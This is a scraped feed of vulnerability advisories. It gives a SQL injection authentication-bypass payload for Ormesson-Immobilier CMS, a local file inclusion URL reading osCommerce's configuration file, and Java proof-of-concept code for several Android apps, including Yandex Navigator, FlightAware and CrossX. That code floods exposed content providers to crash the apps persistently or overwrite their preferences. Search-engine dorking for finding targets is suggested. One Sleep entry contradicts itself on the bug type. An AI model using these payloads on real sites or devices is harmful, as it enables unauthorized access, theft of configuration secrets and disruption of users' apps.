Ormesson-Immobilier CMS version 8 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Ormesson-immobilier cms v8 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.easysolutions.lu/                                                                                      |  | # Dork      : powered by Sogis.be ©                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & Pass : 1' or 1=1 -- -[+] http://127.0.0.1/ormesson/MyGestion/#/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Ormesson-Immobilier CMS 8 SQL Injection

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 2 and June 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 2 to June 9

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Yandex Navigator（CVE-2023-29751）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

while (true) {
    ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
    Intent intent = new Intent();
    intent.setComponent(componentName);
    intent.putExtra("service\_version", 0);
    intent.setAction("ru.yandex.common.clid.update\_preferences");
    intent.putExtra("preferences", "STORAGE");
    intent.putExtra("application", "ru.yandex.yandexnavi");
    Bundle bundle = new Bundle();
    Bundle bundle2 = new Bundle();
    Bundle bundle3 = new Bundle();
    String randomString = getRandomString(50240);
    bundle2.putString(randomString, randomString);
    bundle3.putLong(randomString, Long.MAX\_VALUE);
    bundle.putBundle("bundle-values", bundle2);
    bundle.putBundle("bundle-time", bundle3);
    intent.putExtra("bundle", bundle);
    ServiceConnection connection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service){
        
        }
        @Override
        public void onServiceDisconnected(ComponentName name) {
            
        }
    };
    bindService(intent,connection,BIND\_AUTO\_CREATE);
}

CVE-2023-29751: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows a local attacker to cause a denial of service via the SharedPreference files.

**Denial of Service exists in Facemoji Emoji Keyboard（CVE-2023-29753）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows a local attacker to cause a denial of service via the SharedPreference files.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
      //targetSharedPreferencesName: any sharedpreferences's name in the app
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/targetShardPreferencesName/xxx");
        while (true){
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key",randomString);
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
        }
    }

CVE-2023-29753: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause a persistent denial of service via the database files.

**Denial of Service exists in CrossX（CVE-2023-29767）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause a persistent denial of service via the database files.

Additional information: The CrossX application allows unauthorized applications to inject data into the database via interfaces in the components it exposes, which will be loaded from the database into memory upon opening the app. Once an attacker injects an excessive amount of data, it can cause the application to trigger an OOM error and crash. The user cannot completely fix the above problem by restarting the application because the data is stored persistently in the database, which eventually leads to persistent denial of service.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29767: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Sleep v.20230303 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Escalation of Privileges exists in Sleep（CVE-2023-29761）**

Vendor: Urbandroid(http://twilight.urbandroid.org/)

Affected product: Sleep(com.urbandroid.sleep)

Version: 20230303

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.sleep

Description of the vulnerability for use in the CVE：An issue found in Sleep v.20230303 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Sleep application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality.

Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as language, some displays of the interface, and also modify the uri of the alarm bell, resulting in an escalation of privilege attack.

poc:

public void attack\_sleep() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
        ContentValues contentValues = new ContentValues();
        contentValues.put(targetKey, targetValue);
        contentResolver.insert(parse, contentValues);
    }

CVE-2023-29761: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in FlightAware v.5.8.0 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

**Denial of Service exists in FlightAware（CVE-2023-29759）**

Vendor: FlightAware(https://flightaware.com/)

Affected product: FlightAware(com.flightaware.android.liveFlightTracker)

Version: 5.8.0

Download link： https://play.google.com/store/apps/details?id=com.flightaware.android.liveFlightTracker

Description of the vulnerability for use in the CVE：An issue found in FlightAware v.5.8.0 allows unauthorized apps to cause a persistent denial of service by manipulating the database files.

Additional information: The FlightAware application allows unauthorized applications to modify the data in its database files through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes.

poc:

public void attack\_flightware() {
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.flightaware.android.liveFlightTracker.FlightAwareContent/airlines");
        while (true) {
            ContentValues contentValues = new ContentValues();
            contentValues.put("url", getRandomString(10240));
            contentValues.put("name\_zh", getRandomString(10240));
            contentValues.put("iata", getRandomString(10240));
            contentValues.put("icao", getRandomString(10240));
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29759: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause an escalation of Privileges via the database files.

**Escalation of Privileges exists in CrossX（CVE-2023-29766）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause an escalation of Privileges via the database files.

Additional information: The CrossX application allows unauthorized applications to use the methods provided in its exposed components to modify data in the Database file, which is loaded at application startup and affects critical application functionality. For example, modify the user's personal data, resulting in an escalation of privilege attack.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", targetVaule);
            contentResolver.insert(uri, contentValues);
    }

CVE-2023-29766: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Twilight（CVE-2023-29755）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
    ContentValues contentValues = new ContentValues();
//attacker can update any data in sharedpreferences!
    contentValues.put(targetKey,targetValue);
    contentResolver.insert(parse,contentValues);
    System.out.println("输入数据");

Tag

#google